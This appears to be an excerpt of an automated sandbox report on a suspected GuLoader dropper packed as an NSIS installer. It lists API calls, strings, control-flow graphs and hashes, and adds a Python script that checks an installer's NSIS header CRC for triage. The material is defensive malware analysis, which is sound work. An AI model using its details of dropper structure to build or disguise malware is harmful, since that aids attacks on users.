                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49027FB0900209EFDB209F95DD85AAE7BB5FB84314F10817AF610BA2E1C7799D42CF58
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 499 406072-40607d 500 406090-4060a6 499->500 501 40607f-40608e 499->501 502 4060ac-4060b9 500->502 503 4062be-4062c4 500->503 501->500 502->503 506 4060bf-4060c6 502->506 504 4062ca-4062d5 503->504 505 4060cb-4060d8 503->505 507 4062e0-4062e1 504->507 508 4062d7-4062db call 406050 504->508 505->504 509 4060de-4060ea 505->509 506->503 508->507 510 4060f0-40612c 509->510 511 4062ab 509->511 513 406132-40613d GetVersion 510->513 514 40624c-406250 510->514 515 4062b9-4062bc 511->515 516 4062ad-4062b7 511->516 517 406157 513->517 518 40613f-406143 513->518 519 406252-406256 514->519 520 406285-406289 514->520 515->503 516->503 524 40615e-406165 517->524 518->517 521 406145-406149 518->521 522 406266-406273 call 406050 519->522 523 406258-406264 call 405f97 519->523 525 406298-4062a9 lstrlenW 520->525 526 40628b-406293 call 406072 520->526 521->517 527 40614b-40614f 521->527 537 406278-406281 522->537 523->537 529 406167-406169 524->529 530 40616a-40616c 524->530 525->503 526->525 527->517 533 406151-406155 527->533 529->530 535 4061a8-4061ab 530->535 536 40616e-406194 call 405f1d 530->536 533->524 538 4061bb-4061be 535->538 539 4061ad-4061b9 GetSystemDirectoryW 535->539 549 406233-406237 536->549 550 40619a-4061a3 call 406072 536->550 537->525 541 406283 537->541 543 4061c0-4061ce GetWindowsDirectoryW 538->543 544 406229-40622b 538->544 542 40622d-406231 539->542 546 406244-40624a call 4062e4 541->546 542->546 542->549 543->544 544->542 548 4061d0-4061da 544->548 546->525 552 4061f4-40620a SHGetSpecialFolderLocation 548->552 553 4061dc-4061df 548->553 549->546 555 406239-40623f lstrcatW 549->555 550->542 557 406225 552->557 558 40620c-406223 SHGetPathFromIDListW CoTaskMemFree 552->558 553->552 556 4061e1-4061e8 553->556 555->546 560 4061f0-4061f2 
556->560 557->544 558->542 558->557 560->542 560->552
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetVersion.KERNEL32(00000000,0042C228,?,004051E6,0042C228,00000000,00000000,0041C400), ref: 00406135
                                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004061B3
                                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 004061C6
                                                                                                                                                                                                          • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406202
                                                                                                                                                                                                          • SHGetPathFromIDListW.SHELL32(?,Call), ref: 00406210
                                                                                                                                                                                                          • CoTaskMemFree.OLE32(?), ref: 0040621B
                                                                                                                                                                                                          • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040623F
                                                                                                                                                                                                          • lstrlenW.KERNEL32(Call,00000000,0042C228,?,004051E6,0042C228,00000000,00000000,0041C400), ref: 00406299
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                                                                                                          • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                          • API String ID: 900638850-1230650788
                                                                                                                                                                                                          • Opcode ID: 9ac22be3adfbab36e9e2758bb774a502216386bf045014d88804defae461a58b
                                                                                                                                                                                                          • Instruction ID: 6a0e75f8176bdfaa808a817e977aa907b1c5d4b6119349843486ba00336cef2a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9ac22be3adfbab36e9e2758bb774a502216386bf045014d88804defae461a58b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45611E71A00105ABDF20AF65CC41AEE37A5EF45314F12817FE852BA2D0D73D8AA1CB4D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 561 405841-405867 call 405b0c 564 405880-405887 561->564 565 405869-40587b DeleteFileW 561->565 567 405889-40588b 564->567 568 40589a-4058aa call 406050 564->568 566 4059fd-405a01 565->566 569 405891-405894 567->569 570 4059ab-4059b0 567->570 574 4058b9-4058ba call 405a50 568->574 575 4058ac-4058b7 lstrcatW 568->575 569->568 569->570 570->566 572 4059b2-4059b5 570->572 576 4059b7-4059bd 572->576 577 4059bf-4059c7 call 406393 572->577 578 4058bf-4058c3 574->578 575->578 576->566 577->566 585 4059c9-4059dd call 405a04 call 4057f9 577->585 581 4058c5-4058cd 578->581 582 4058cf-4058d5 lstrcatW 578->582 581->582 584 4058da-4058f6 lstrlenW FindFirstFileW 581->584 582->584 586 4059a0-4059a4 584->586 587 4058fc-405904 584->587 601 4059f5-4059f8 call 4051af 585->601 602 4059df-4059e2 585->602 586->570 589 4059a6 586->589 590 405924-405938 call 406050 587->590 591 405906-40590e 587->591 589->570 603 40593a-405942 590->603 604 40594f-40595a call 4057f9 590->604 593 405910-405918 591->593 594 405983-405993 FindNextFileW 591->594 593->590 597 40591a-405922 593->597 594->587 600 405999-40599a FindClose 594->600 597->590 597->594 600->586 601->566 602->576 607 4059e4-4059f3 call 4051af call 405ef1 602->607 603->594 608 405944-40594d call 405841 603->608 614 40597b-40597e call 4051af 604->614 615 40595c-40595f 604->615 607->566 608->594 614->594 617 405961-405971 call 4051af call 405ef1 615->617 618 405973-405979 615->618 617->594 618->594
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • DeleteFileW.KERNELBASE(?,?,75BA3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040586A
                                                                                                                                                                                                          • lstrcatW.KERNEL32(0042F250,\*.*), ref: 004058B2
                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,0040A014), ref: 004058D5
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,0040A014,?,0042F250,?,?,75BA3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058DB
                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(0042F250,?,?,?,0040A014,?,0042F250,?,?,75BA3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058EB
                                                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 0040598B
                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0040599A
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • "C:\Users\user\Desktop\SMGS-RCDU5010031.exe", xrefs: 00405841
                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040584E
                                                                                                                                                                                                          • \*.*, xrefs: 004058AC
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\SMGS-RCDU5010031.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                                                                                          • API String ID: 2035342205-3179961289
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindFirstFileW.KERNELBASE(75BA3420,00430298,0042FA50,00405B55,0042FA50,0042FA50,00000000,0042FA50,0042FA50,75BA3420,?,C:\Users\user\AppData\Local\Temp\,00405861,?,75BA3420,C:\Users\user\AppData\Local\Temp\), ref: 0040639E
• FindClose.KERNEL32(00000000), ref: 004063AA
Memory Dump Source
• Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(00000028,?,?,00403F75), ref: 00404157
Memory Dump Source
• Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Control-flow graph of the function at 00403C3C, with executed and not-executed basic blocks; the graph rendering is not reproduced in this text version. The API calls reached from this function are listed under APIs.]
APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C78
• ShowWindow.USER32(?), ref: 00403C95
• DestroyWindow.USER32 ref: 00403CA9
• SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CC5
• GetDlgItem.USER32(?,?), ref: 00403CE6
• SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CFA
• IsWindowEnabled.USER32(00000000), ref: 00403D01
• GetDlgItem.USER32(?,?), ref: 00403DAF
• GetDlgItem.USER32(?,00000002), ref: 00403DB9
• SetClassLongW.USER32(?,000000F2,?), ref: 00403DD3
• SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403E24
• GetDlgItem.USER32(?,00000003), ref: 00403ECA
• ShowWindow.USER32(00000000,?), ref: 00403EEB
• KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403EFD
• EnableWindow.USER32(?,?), ref: 00403F18
• GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403F2E
• EnableMenuItem.USER32(00000000), ref: 00403F35
• SendMessageW.USER32(?,000000F4,00000000,?), ref: 00403F4D
• SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F60
• lstrlenW.KERNEL32(0042D248,?,0042D248,Snubbendes Setup), ref: 00403F89
• SetWindowTextW.USER32(?,0042D248), ref: 00403F9D
• ShowWindow.USER32(?,0000000A), ref: 004040D1
Strings
Memory Dump Source
• Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
Similarity
• API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
• String ID: Snubbendes Setup
• API String ID: 3282139019-3918928792
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                           Control-flow Graph

                                                                                                                                                                                                           • Graph for the function at 00403899-00403B6E (rendered image; executed/not-executed block colouring and node list not reproduced)
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040642A: GetModuleHandleA.KERNEL32(?,00000020,?,00403309,00000009), ref: 0040643C
                                                                                                                                                                                                            • Part of subcall function 0040642A: GetProcAddress.KERNEL32(00000000,?), ref: 00406457
                                                                                                                                                                                                          • lstrcatW.KERNEL32(1033,0042D248), ref: 0040391A
                                                                                                                                                                                                          • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\Tilbjelig\diagonallsende\Timebudgetter114,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,75BA3420), ref: 0040399A
                                                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\Tilbjelig\diagonallsende\Timebudgetter114,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000), ref: 004039AD
                                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(Call), ref: 004039B8
                                                                                                                                                                                                          • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\Tilbjelig\diagonallsende\Timebudgetter114), ref: 00403A01
                                                                                                                                                                                                            • Part of subcall function 00405F97: wsprintfW.USER32 ref: 00405FA4
                                                                                                                                                                                                          • RegisterClassW.USER32(00433E80), ref: 00403A3E
                                                                                                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A56
                                                                                                                                                                                                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A8B
                                                                                                                                                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403AC1
                                                                                                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,00433E80), ref: 00403AED
                                                                                                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit,00433E80), ref: 00403AFA
                                                                                                                                                                                                          • RegisterClassW.USER32(00433E80), ref: 00403B03
                                                                                                                                                                                                          • DialogBoxParamW.USER32(?,00000000,00403C3C,00000000), ref: 00403B22
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                           • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                           • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                           • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                           • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                           • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                           • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                           • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                           • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                           • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                           • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\SMGS-RCDU5010031.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Tilbjelig\diagonallsende\Timebudgetter114$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                                                                          • API String ID: 1975747703-917014046
                                                                                                                                                                                                          • Opcode ID: 42654ec177014d1f03b4ff0d2635b06bf077c7dc75d3c24c479e90fc5b65b2ec
                                                                                                                                                                                                          • Instruction ID: d3915a60f35156ec108069fee93d058ae2b4a83f87b830a45993cae0616e5fa0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 42654ec177014d1f03b4ff0d2635b06bf077c7dc75d3c24c479e90fc5b65b2ec
                                                                                                                                                                                                          • Instruction Fuzzy Hash: EF61AA71640700AFD310AF659D46F2B3A6CEB84B4AF40113FF941B51E2DB7D6941CA2D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                           Control-flow Graph

                                                                                                                                                                                                           • Graph for the function at 00402DEE-00403024 (rendered image; executed/not-executed block colouring and node list not reproduced)
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00402DFF
                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SMGS-RCDU5010031.exe,00000400,?,?,"C:\Users\user\Desktop\SMGS-RCDU5010031.exe",00403536,?), ref: 00402E1B
                                                                                                                                                                                                            • Part of subcall function 00405C25: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\SMGS-RCDU5010031.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\SMGS-RCDU5010031.exe",00403536,?), ref: 00405C29
                                                                                                                                                                                                            • Part of subcall function 00405C25: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\SMGS-RCDU5010031.exe",00403536,?), ref: 00405C4B
                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SMGS-RCDU5010031.exe,C:\Users\user\Desktop\SMGS-RCDU5010031.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\SMGS-RCDU5010031.exe",00403536,?), ref: 00402E67
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                           • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                           • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                           • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                           • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                           • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                           • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                           • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                           • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                           • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                           • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\SMGS-RCDU5010031.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SMGS-RCDU5010031.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                          • API String ID: 4283519449-2280241162
                                                                                                                                                                                                          • Opcode ID: 2d58fb7518fc77c1929eb66d2bb22aca03531c5a37bc9e9edabb7a8ef5e27e55
                                                                                                                                                                                                          • Instruction ID: ecf8b1e823d6f98de7c15f593086dd5554d056807b59ad61161c89ef3c81dadd
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d58fb7518fc77c1929eb66d2bb22aca03531c5a37bc9e9edabb7a8ef5e27e55
                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF51F671900216ABDB109F61DE89B9F7BB8FB54394F21413BF904B62C1C7B89D409B6C
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%
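                                                                                                                                                                                                           The API sequence in the function above (GetModuleFileNameW on its own image, CreateFileW, GetFileSize, then a read loop ending in SetFilePointer) together with the "Null", "soft", "Inst" and "Installer integrity check has failed" strings is the NSIS exehead locating its first header in the installer file and running the CRC integrity check; that is what makes this GuLoader dropper an NSIS-wrapped installer. The Python below reproduces that check offline so a suspected sample can be triaged without executing it. It is an added example, not code from the Joe Sandbox report or from the NSIS project. The first-header layout, the 0xDEADBEEF signature, the flag bit values and the 512-byte search stride are taken from the NSIS exehead source as I know it and are assumptions here; the sample image is constructed inline.

```python
"""Locate and verify the NSIS first header the way the exehead stub does.

Added example for triage of NSIS-wrapped samples; not NSIS or Joe Sandbox code.
Assumed layout (NSIS exehead 'firstheader' struct):
    int32 flags, int32 siginfo (0xDEADBEEF), char nsinst[12] ("NullsoftInst"),
    int32 length_of_header, int32 length_of_all_following_data
The stub reads itself in 512-byte blocks and tests for the header at each block
start, then CRC32s everything before the trailing 4-byte CRC.
"""
import struct
import zlib

NSIS_SIG = 0xDEADBEEF
NSIS_MAGIC = b"NullsoftInst"               # the "Null" "soft" "Inst" strings in the dump
FIRSTHEADER = struct.Struct("<II12sII")    # flags, siginfo, nsinst, hdr_len, data_len
BLOCK = 512                                # read/search stride of the stub

FH_FLAGS_UNINSTALL = 1                     # flag bits, per NSIS fileform.h (assumed)
FH_FLAGS_SILENT = 2
FH_FLAGS_NO_CRC = 4
FH_FLAGS_FORCE_CRC = 8


def find_firstheader(image: bytes):
    """Return (offset, flags, hdr_len, data_len) of the first header, or None."""
    for off in range(0, len(image) - FIRSTHEADER.size + 1, BLOCK):
        flags, sig, magic, hdr_len, data_len = FIRSTHEADER.unpack_from(image, off)
        if sig == NSIS_SIG and magic == NSIS_MAGIC:
            return off, flags, hdr_len, data_len
    return None


def check_integrity(image: bytes) -> dict:
    """Mimic the stub's header search and integrity check on an in-memory image.

    Simplification: the real stub also skips the CRC for silent installs unless
    FH_FLAGS_FORCE_CRC is set; here only FH_FLAGS_NO_CRC disables it.
    """
    found = find_firstheader(image)
    if found is None:
        return {"nsis": False, "reason": "no first header at any 512-byte boundary"}
    off, flags, hdr_len, data_len = found
    end = off + data_len                   # installer data ends here; last 4 bytes = CRC
    result = {"nsis": True, "offset": off, "flags": flags, "header_len": hdr_len,
              "installer_end": end, "crc_checked": False, "crc_ok": None}
    if end > len(image) or data_len < FIRSTHEADER.size + 4:
        result["reason"] = "truncated: installer data runs past end of file"
        return result
    if flags & FH_FLAGS_NO_CRC:
        return result
    stored = struct.unpack_from("<I", image, end - 4)[0]
    computed = zlib.crc32(image[: end - 4]) & 0xFFFFFFFF
    result.update(crc_checked=True, crc_ok=(stored == computed),
                  stored_crc=stored, computed_crc=computed)
    return result


def build_sample(payload: bytes, flags: int = 0, corrupt: bool = False) -> bytes:
    """Constructed test image: 512-byte fake stub, first header, payload, CRC.

    The header_len field is set to len(payload) for illustration only.
    """
    stub = b"MZ" + b"\x00" * (BLOCK - 2)
    data_len = FIRSTHEADER.size + len(payload) + 4
    fh = FIRSTHEADER.pack(flags, NSIS_SIG, NSIS_MAGIC, len(payload), data_len)
    body = stub + fh + payload
    crc = zlib.crc32(body) & 0xFFFFFFFF    # CRC covers everything before the CRC itself
    if corrupt:
        body = body[:-1] + bytes([body[-1] ^ 0xFF])   # tamper with one payload byte
    return body + struct.pack("<I", crc)


if __name__ == "__main__":
    good = build_sample(b"compressed header and data" * 3)
    print(check_integrity(good))
    print(check_integrity(build_sample(b"compressed header and data" * 3, corrupt=True)))
```

                                                                                                                                                                                                           For a real file call check_integrity(open(path, "rb").read()). A valid header with a failing CRC usually means the binary was modified after it was built (patched stub, appended data), which is itself a triage signal; no header at any 512-byte boundary means the file is not an NSIS installer even if it carries NSIS-looking strings.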

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000,00000000), ref: 004017A8
                                                                                                                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\Tilbjelig\diagonallsende\Timebudgetter114\Davening\Udmeldes,?,?,00000031), ref: 004017CD
                                                                                                                                                                                                            • Part of subcall function 00406050: lstrcpynW.KERNEL32(?,?,00000400,0040334D,Snubbendes Setup,NSIS Error), ref: 0040605D
                                                                                                                                                                                                            • Part of subcall function 004051AF: lstrlenW.KERNEL32(0042C228,00000000,0041C400,75BA23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051E7
                                                                                                                                                                                                            • Part of subcall function 004051AF: lstrlenW.KERNEL32(0040318B,0042C228,00000000,0041C400,75BA23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051F7
                                                                                                                                                                                                            • Part of subcall function 004051AF: lstrcatW.KERNEL32(0042C228,0040318B), ref: 0040520A
                                                                                                                                                                                                            • Part of subcall function 004051AF: SetWindowTextW.USER32(0042C228,0042C228), ref: 0040521C
                                                                                                                                                                                                            • Part of subcall function 004051AF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405242
                                                                                                                                                                                                            • Part of subcall function 004051AF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040525C
                                                                                                                                                                                                            • Part of subcall function 004051AF: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526A
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
